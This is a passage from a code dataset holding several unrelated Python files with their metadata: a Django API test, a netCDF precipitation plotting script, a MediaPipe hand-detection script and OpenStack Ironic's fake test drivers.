\"interval_end\": \"22:00:00\"\n }\n\n response = self.client.put(url_detail, data=json.dumps(new_data), content_type='application/json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json()['call_charge'], new_data['call_charge'])\n", "sub_path": "phonebillsapi/api/tests/views/test_tariff_view.py", "file_name": "test_tariff_view.py", "file_ext": "py", "file_size_in_byte": 1955, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.reverse.reverse", "line_number": 13, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 25, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 25, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 28, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 28, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 28, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 29, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 29, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 33, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 33, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 37, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 37, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.reverse.reverse", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 42, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 46, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 46, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 46, "usage_type": "name"}, {"api_name": "rest_framework.reverse.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "589645750", "text": "# coding: utf-8\r\nfrom netCDF4 import Dataset\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom mpl_toolkits.basemap import Basemap\r\n\r\n\r\n\r\ndef plot_nc(lons, lats, precips):\r\n m = Basemap(width=200000, height=200000, projection='stere',\r\n lat_0=lat_0, lon_0=lon_0)\r\n lon, lat = np.meshgrid(lons, lats)\r\n xi, yi = m(lon, lat)\r\n cs = m.pcolor(xi, yi, precips[0])\r\n m.drawstates()\r\n m.drawcounties()\r\n cbar = m.colorbar(cs, location='bottom', pad='10%')\r\n plt.show()\r\n\r\n# get data\r\nn = Dataset('2016102418.nc', 'r+')\r\nlons = n.variables['longitude'][:]\r\nlats = n.variables['latitude'][:]\r\nlat_0 = lats.mean()\r\nlon_0 = lons.mean()\r\nprcips = n.variables['precipitation'][:]\r\nn.close()\r\n\r\n# plot\r\nplot_nc(lons, lats, prcips)\r\n\r\n\r\n", "sub_path": "PhaseI/DataPreparation/plot_nc.py", "file_name": "plot_nc.py", "file_ext": "py", "file_size_in_byte": 770, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "netCDF4.Dataset", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "190364507", "text": "import cv2\nimport mediapipe as mp\n\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\ncap = cv2.VideoCapture(0)\n\n_, frame = cap.read()\n\nh, w, _ = frame.shape\n\nwhile True:\n _, frame = cap.read()\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w \n y_min = h \n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n cv2.rectangle(frame, (x_min - 30, y_min - 30), (x_max + 30 , y_max + 30), (0, 255, 0), 2)\n mp_drawing.draw_landmarks(frame, handLMs, mphands.HAND_CONNECTIONS)\n cv2.imshow(\"Frame\", frame)\n\n cv2.waitKey(1)", "sub_path": "misc/hand_bbox.py", "file_name": "hand_bbox.py", "file_ext": "py", "file_size_in_byte": 1095, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "mediapipe.solutions", "line_number": 4, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "650921278", "text": "# -*- encoding: utf-8 -*-\n#\n# Copyright 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nFake drivers used in testing.\n\"\"\"\n\nfrom oslo_utils import importutils\n\nfrom ironic.common import exception\nfrom ironic.common.i18n import _\nfrom ironic.drivers import base\nfrom ironic.drivers.modules import agent\nfrom ironic.drivers.modules.cimc import management as cimc_mgmt\nfrom ironic.drivers.modules.cimc import power as cimc_power\nfrom ironic.drivers.modules.drac import deploy as drac_deploy\nfrom ironic.drivers.modules.drac import inspect as drac_inspect\nfrom ironic.drivers.modules.drac import management as drac_mgmt\nfrom ironic.drivers.modules.drac import power as drac_power\nfrom ironic.drivers.modules.drac import raid as drac_raid\nfrom ironic.drivers.modules.drac import vendor_passthru as drac_vendor\nfrom ironic.drivers.modules import fake\nfrom ironic.drivers.modules.ilo import inspect as ilo_inspect\nfrom ironic.drivers.modules.ilo import management as ilo_management\nfrom ironic.drivers.modules.ilo import power as ilo_power\nfrom ironic.drivers.modules import inspector\nfrom ironic.drivers.modules import ipmitool\nfrom ironic.drivers.modules.irmc import inspect as irmc_inspect\nfrom ironic.drivers.modules.irmc import management as irmc_management\nfrom ironic.drivers.modules.irmc import power as irmc_power\nfrom ironic.drivers.modules import iscsi_deploy\nfrom ironic.drivers.modules.oneview import common as oneview_common\nfrom ironic.drivers.modules.oneview import management as oneview_management\nfrom ironic.drivers.modules.oneview import power as oneview_power\nfrom ironic.drivers.modules import pxe\nfrom ironic.drivers.modules import snmp\nfrom ironic.drivers.modules import ssh\nfrom ironic.drivers.modules.ucs import management as ucs_mgmt\nfrom ironic.drivers.modules.ucs import power as ucs_power\nfrom ironic.drivers import utils\n\n\nclass FakeDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = fake.FakePower()\n self.deploy = fake.FakeDeploy()\n self.boot = fake.FakeBoot()\n\n self.a = fake.FakeVendorA()\n self.b = fake.FakeVendorB()\n self.mapping = {'first_method': self.a,\n 'second_method': self.b,\n 'third_method_sync': self.b,\n 'fourth_method_shared_lock': self.b}\n self.vendor = utils.MixinVendorInterface(self.mapping)\n self.console = fake.FakeConsole()\n self.management = fake.FakeManagement()\n self.inspect = fake.FakeInspect()\n self.raid = fake.FakeRAID()\n\n\nclass FakeSoftPowerDriver(FakeDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n super(FakeSoftPowerDriver, self).__init__()\n self.power = fake.FakeSoftPower()\n\n\nclass FakeIPMIToolDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = ipmitool.IPMIPower()\n self.console = ipmitool.IPMIShellinaboxConsole()\n self.deploy = fake.FakeDeploy()\n self.vendor = ipmitool.VendorPassthru()\n self.management = ipmitool.IPMIManagement()\n\n\nclass FakeIPMIToolSocatDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = ipmitool.IPMIPower()\n self.console = ipmitool.IPMISocatConsole()\n self.deploy = fake.FakeDeploy()\n self.vendor = ipmitool.VendorPassthru()\n self.management = ipmitool.IPMIManagement()\n\n\nclass FakePXEDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = fake.FakePower()\n self.boot = pxe.PXEBoot()\n self.deploy = iscsi_deploy.ISCSIDeploy()\n\n\nclass FakeSSHDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n supported = False\n\n def __init__(self):\n self.power = ssh.SSHPower()\n self.deploy = fake.FakeDeploy()\n self.management = ssh.SSHManagement()\n self.console = ssh.ShellinaboxConsole()\n\n\nclass FakeAgentDriver(base.BaseDriver):\n \"\"\"Example implementation of an AgentDriver.\"\"\"\n\n def __init__(self):\n self.power = fake.FakePower()\n self.boot = pxe.PXEBoot()\n self.deploy = agent.AgentDeploy()\n self.raid = agent.AgentRAID()\n\n\nclass FakeIloDriver(base.BaseDriver):\n \"\"\"Fake iLO driver, used in testing.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('proliantutils'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import proliantutils library\"))\n self.power = ilo_power.IloPower()\n self.deploy = fake.FakeDeploy()\n self.management = ilo_management.IloManagement()\n self.inspect = ilo_inspect.IloInspect()\n\n\nclass FakeDracDriver(base.BaseDriver):\n \"\"\"Fake Drac driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('dracclient'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_('Unable to import python-dracclient library'))\n\n self.power = drac_power.DracPower()\n self.deploy = drac_deploy.DracDeploy()\n self.management = drac_mgmt.DracManagement()\n self.raid = drac_raid.DracRAID()\n self.vendor = drac_vendor.DracVendorPassthru()\n self.inspect = drac_inspect.DracInspect()\n\n\nclass FakeSNMPDriver(base.BaseDriver):\n \"\"\"Fake SNMP driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('pysnmp'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import pysnmp library\"))\n self.power = snmp.SNMPPower()\n self.deploy = fake.FakeDeploy()\n\n\nclass FakeIRMCDriver(base.BaseDriver):\n \"\"\"Fake iRMC driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('scciclient'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import python-scciclient library\"))\n self.power = irmc_power.IRMCPower()\n self.deploy = fake.FakeDeploy()\n self.management = irmc_management.IRMCManagement()\n self.inspect = irmc_inspect.IRMCInspect()\n\n\nclass FakeIPMIToolInspectorDriver(base.BaseDriver):\n \"\"\"Fake Inspector driver.\"\"\"\n\n def __init__(self):\n self.power = ipmitool.IPMIPower()\n self.console = ipmitool.IPMIShellinaboxConsole()\n self.deploy = fake.FakeDeploy()\n self.vendor = ipmitool.VendorPassthru()\n self.management = ipmitool.IPMIManagement()\n # NOTE(dtantsur): unlike other uses of Inspector, this one is\n # unconditional, as this driver is designed for testing inspector\n # integration.\n self.inspect = inspector.Inspector()\n\n\nclass FakeUcsDriver(base.BaseDriver):\n \"\"\"Fake UCS driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('UcsSdk'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import UcsSdk library\"))\n self.power = ucs_power.Power()\n self.deploy = fake.FakeDeploy()\n self.management = ucs_mgmt.UcsManagement()\n\n\nclass FakeCIMCDriver(base.BaseDriver):\n \"\"\"Fake CIMC driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('ImcSdk'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import ImcSdk library\"))\n self.power = cimc_power.Power()\n self.deploy = fake.FakeDeploy()\n self.management = cimc_mgmt.CIMCManagement()\n\n\nclass FakeOneViewDriver(base.BaseDriver):\n \"\"\"Fake OneView driver. For testing purposes. \"\"\"\n\n def __init__(self):\n if not importutils.try_import('oneview_client.client'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import python-oneviewclient library\"))\n\n # Checks connectivity to OneView and version compatibility on driver\n # initialization\n oneview_client = oneview_common.get_oneview_client()\n oneview_client.verify_oneview_version()\n oneview_client.verify_credentials()\n self.power = oneview_power.OneViewPower()\n self.management = oneview_management.OneViewManagement()\n self.boot = fake.FakeBoot()\n self.deploy = fake.FakeDeploy()\n self.inspect = fake.FakeInspect()\n", "sub_path": "ironic/drivers/fake.py", "file_name": "fake.py", "file_ext": "py", "file_size_in_byte": 9111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "ironic.drivers.base.BaseDriver", "line_number": 55, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 55, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakePower", "line_number": 59, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 59, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 60, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 60, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeBoot", "line_number": 61, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 61, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeVendorA", "line_number": 63, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 63, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeVendorB", "line_number": 64, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 64, "usage_type": "name"}, {"api_name": "ironic.drivers.utils.MixinVendorInterface", "line_number": 69, "usage_type": "call"}, {"api_name": "ironic.drivers.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeConsole", "line_number": 70, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 70, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeManagement", "line_number": 71, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 71, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeInspect", "line_number": 72, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 72, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeRAID", "line_number": 73, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 73, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeSoftPower", "line_number": 81, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 81, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 84, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIPower", "line_number": 88, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 88, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIShellinaboxConsole", "line_number": 89, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 89, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 90, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 90, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.VendorPassthru", "line_number": 91, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 91, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIManagement", "line_number": 92, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 92, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 95, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 95, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIPower", "line_number": 99, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 99, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMISocatConsole", "line_number": 100, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 100, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 101, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 101, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.VendorPassthru", "line_number": 102, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 102, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIManagement", "line_number": 103, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 103, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 106, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 106, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakePower", "line_number": 110, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 110, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.pxe.PXEBoot", "line_number": 111, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.pxe", "line_number": 111, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.iscsi_deploy.ISCSIDeploy", "line_number": 112, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.iscsi_deploy", "line_number": 112, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 115, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 115, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ssh.SSHPower", "line_number": 121, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ssh", "line_number": 121, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 122, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 122, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ssh.SSHManagement", "line_number": 123, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ssh", "line_number": 123, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ssh.ShellinaboxConsole", "line_number": 124, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ssh", "line_number": 124, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 127, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 127, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakePower", "line_number": 131, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 131, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.pxe.PXEBoot", "line_number": 132, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.pxe", "line_number": 132, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.agent.AgentDeploy", "line_number": 133, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.agent", "line_number": 133, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.agent.AgentRAID", "line_number": 134, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.agent", "line_number": 134, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 137, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 137, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 141, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 141, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 142, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 142, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 144, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.power.IloPower", "line_number": 145, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.power", "line_number": 145, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 146, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 146, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ilo.management.IloManagement", "line_number": 147, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.management", "line_number": 147, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ilo.inspect.IloInspect", "line_number": 148, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.inspect", "line_number": 148, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 151, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 151, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 155, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 155, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 156, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 156, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 158, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.power.DracPower", "line_number": 160, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.power", "line_number": 160, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.deploy.DracDeploy", "line_number": 161, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.deploy", "line_number": 161, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.management.DracManagement", "line_number": 162, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.management", "line_number": 162, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.raid.DracRAID", "line_number": 163, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.raid", "line_number": 163, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.vendor_passthru.DracVendorPassthru", "line_number": 164, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.vendor_passthru", "line_number": 164, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.inspect.DracInspect", "line_number": 165, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.inspect", "line_number": 165, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 168, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 168, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 172, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 172, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 173, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 173, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 175, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.snmp.SNMPPower", "line_number": 176, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.snmp", "line_number": 176, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 177, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 177, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 180, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 180, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 184, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 184, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 185, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 185, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 187, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.power.IRMCPower", "line_number": 188, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.power", "line_number": 188, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 189, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 189, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.irmc.management.IRMCManagement", "line_number": 190, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.management", "line_number": 190, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.irmc.inspect.IRMCInspect", "line_number": 191, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.inspect", "line_number": 191, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 194, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 194, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIPower", "line_number": 198, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 198, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIShellinaboxConsole", "line_number": 199, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 199, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 200, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 200, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.VendorPassthru", "line_number": 201, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 201, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIManagement", "line_number": 202, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 202, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.inspector.Inspector", "line_number": 206, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.inspector", "line_number": 206, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 209, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 209, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 213, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 213, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 214, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 214, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 216, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ucs.power.Power", "line_number": 217, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ucs.power", "line_number": 217, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 218, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 218, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ucs.management.UcsManagement", "line_number": 219, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ucs.management", "line_number": 219, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 222, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 222, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 226, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 226, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 227, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 227, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 229, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.cimc.power.Power", "line_number": 230, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.cimc.power", "line_number": 230, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 231, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 231, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.cimc.management.CIMCManagement", "line_number": 232, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.cimc.management", "line_number": 232, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 235, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 235, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 239, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 239, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 240, "usage_type": "call"}, 